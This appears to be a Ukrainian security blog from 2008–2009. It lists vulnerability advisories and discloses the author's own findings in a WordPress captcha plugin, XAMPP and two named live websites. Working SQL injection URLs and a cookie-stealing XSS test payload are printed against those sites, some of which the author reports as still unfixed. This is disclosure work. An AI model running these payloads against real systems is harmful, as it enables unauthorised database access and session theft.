Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• CenterIM <= 4.22.3 Remote Command Execution Vulnerability (деталі)
• PhpWebGallery 1.3.4 Multiple Vulnerabilities (XSS/LFI) (деталі)
• Surgemail 38k4 IMAP server remote stack overflow (деталі)
• VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman (деталі)
• Advanced Electron Forum <= 1.0.6 Remote Code Execution (деталі)
• Annuaire Telephonique v1.0 Sensetive Files (MDP) (деталі)
• PHP pro bid v 6.04 SQL injection (деталі)
• LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities (деталі)
• cyask 3.x Local File Inclusion Vulnerability (деталі)
• Sama XSS Bug (деталі)

Вчора, 07.08.2009, коли я оприлюднив уразливості в Dumb math captcha для WordPress, я виявив нову Insufficient Anti-automation уразливість Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

При передачі параметра action зі значенням commentopenid, значення відповіді капчі не перевіряється, що дозволяє обійти капчу (на сторінках записів). Це автор плагіна зробив чорний хід (backdoor) в капчі, який може бути використаний для її обходу. Така собі spamer friendly капча .

Dumb math captcha CAPTCHA bypass.html

Уразлива версія Dumb math captcha 1.0.

01.07.2009

У червні, 27.06.2009, я знайшов Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

08.08.2009

CSRF:

http://site/xampp/cds-fpdf.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Сьогодні я вияснив, що капча плагін для WordPress, в якому я виявив дірки, що використовуться на сайті www.developers.org.ua, зветься Dumb math captcha. Тобто це не окремий php-скрипт від власників www.developers.org.ua (бо адміни сайта так мені й не відповіли), а саме плагін для WP, який використовувався на декількох сайтах. І враховуючи, що вихідний код цього плагіна доступний в Мережі, його також можуть використати інші люди.

Тому Insufficient Anti-automation та Full path disclosure уразливості, що я знайшов у січні, 22.01.2008, мають місце у Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

Капча на сторінках записів вразлива до Constant values bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одне і те саме значення параметра dumb_captcha (dumb_captcha = 9).

Full path disclosure:

http://site/wp-content/plugins/dumb_captcha.php

Уразлива версія Dumb math captcha 1.0.

В даній добірці уразливості в веб додатках:

• Microsoft SQL Server - Corrupt Backup File Heap Overflow (деталі)
• Microsoft SQL Server Restore Integer Underflow Vulnerability (деталі)
• Important Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203) (деталі)
• Horde, Popoon frameworks common input sanitization errors (XSS) (деталі)
• Stash v1.0.3 Admin bypass / Remote File Disclosure (деталі)
• Multiple Vulnerabilities: LedgerSMB < 1.2.15 (деталі)
• Pro2col StingRay FTS login username cross site scripting (деталі)
• Multiple vulnerabilities in Nooms 1.1 (деталі)
• minb Remote Code Execution Exploit (деталі)
• PhsBlog v0.2 Bypass Sql injection Filtering Exploit (деталі)

У грудні, 11.12.2008, я знайшов Cross-Site Request Forgery, Cross-Site Scripting та CRLF Injection уразливості в плагіні Subscribe To Comments для WordPress. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в Subscribe To Comments WordPress plugin.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

В даній добірці уразливості в веб додатках:

• CiscoWorks Internetwork Performance Monitor Remote Command Execution Vulnerability (деталі)
• Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 (деталі)
• Vulnerability in python-django (деталі)
• aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• Zen Cart <= 1.3.8a SQL Injection (деталі)
• HP Select Identity Software, Gain Unauthorized Access (деталі)
• phpAdultSite CMS flaws (деталі)
• xoops-1.3.10 shell command execute vulnerability ( causing snoopy class ) (деталі)
• Cross-domain redirect on RSA Authentication Agent (деталі)
• XSS on RSA Authentication Agent login page (деталі)

У грудні, 13.12.2008, я знайшов Cross-Site Scripting уразливості на проекті http://addons.miranda-im.org. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на addons.miranda-im.org.

XSS:

• alert(document.cookie)
• цікавий
• html включення

POST запит на сторінці http://addons.miranda-im.org/login.php в полі Username. Зараз ця уразливість вже виправлена (через зміни в роботі форми логіна).

POST запит на сторінці http://addons.miranda-im.org/login.php ?action=lostpwd

"><script>alert(document.cookie)</script>В поліях: Username та E-mail.

07.05.2009

У серпні, 19.08.2008, я знайшов SQL Injection уразливість, а сьогодні ще нові SQL Injection та Cross-Site Scripting уразливості на сайті http://www.kino-ukraina.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kino-ukraina.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.08.2009

SQL Injection:

http://www.kino-ukraina.com.ua/?id=-1%27%20or%201=1/*

Вже виправлена в результаті змін на сайті.

http://www.kino-ukraina.com.ua/showwait.php?wait_id=84%20and%20version()=5

http://www.kino-ukraina.com.ua/showwait.php?wait_id=-1%20union%20select%200,0,version(),0%23

http://www.kino-ukraina.com.ua/showfilm.php?film_id=88%20and%20version()=5

http://www.kino-ukraina.com.ua/showopen.php?opening_id=53%20and%20version()=5

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Більшість з уразливостей так досі й не виправлені.

В даній добірці уразливості в веб додатках:

• Aztech ADSL2/2+ 4 Port default password (деталі)
• New slash packages fix multiple vulnerabilities (деталі)
• Plesk 8.6.0 authentication flaw allows to gain virtual user priviledges (деталі)
• Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 (деталі)
• Sea-Surfing on the Motorola Surfboard (деталі)
• TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload (деталі)
• BizDirectory <== 2.04 Cross-Site Scripting Vulnerabilities (деталі)
• CS-Cart <= 1.3.5 SQL Injection (деталі)
• Blue Coat K9 Web Protection Response Handling Buffer Overflows (деталі)
• Blue Coat K9 Web Protection “Referer” Header Buffer Overflow (деталі)